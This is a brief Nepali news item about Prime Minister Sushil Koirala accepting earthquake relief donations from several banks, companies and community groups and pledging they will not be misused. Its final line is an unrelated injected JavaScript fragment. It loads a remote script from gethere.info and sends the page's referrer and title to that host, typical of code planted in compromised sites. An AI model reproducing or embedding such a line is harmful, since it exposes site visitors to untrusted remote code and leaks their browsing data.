प्रधानमन्त्री सुसील कोईरालाले बिभिन्न संघ संस्थाबाट प्राप्त भएका राहत सहयोगको दुरुपयोग हुन नदिने आश्वासन दिनुभएको छ।
शुक्रबार बिहान बिभिन्न संघ संस्थाको राहत सहयोग ग्रहण गर्दे उहाले पिडितहरु समक्ष राहत पुराउने प्रतिवद्धता समेत जनाउनुभयो। त्यस्तै उहाले बिपतको घडिमा सबै नागरिकहरु एक भएर हातेमालो गर्नुपर्नेमा समेत जोड दिनुभयो। मुलुकमा गएको महाभूकम्पपछि नेपालमा रहेका बिभिन्न संस्थाहरुले प्रधानमन्त्री दैवी उद्दार राहत कोषमा सहयोग रकम हस्तान्तर गरेका थिए। शुक्रबार राष्ट्रिय बिमा संस्थान , राष्ट्रिय बाणिज्य बैंक , सुमार्गी ग्रुप , सुविसु र मुस्लीम समाजले आर्थिक सहयोग प्रदान गरेको थियो।
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;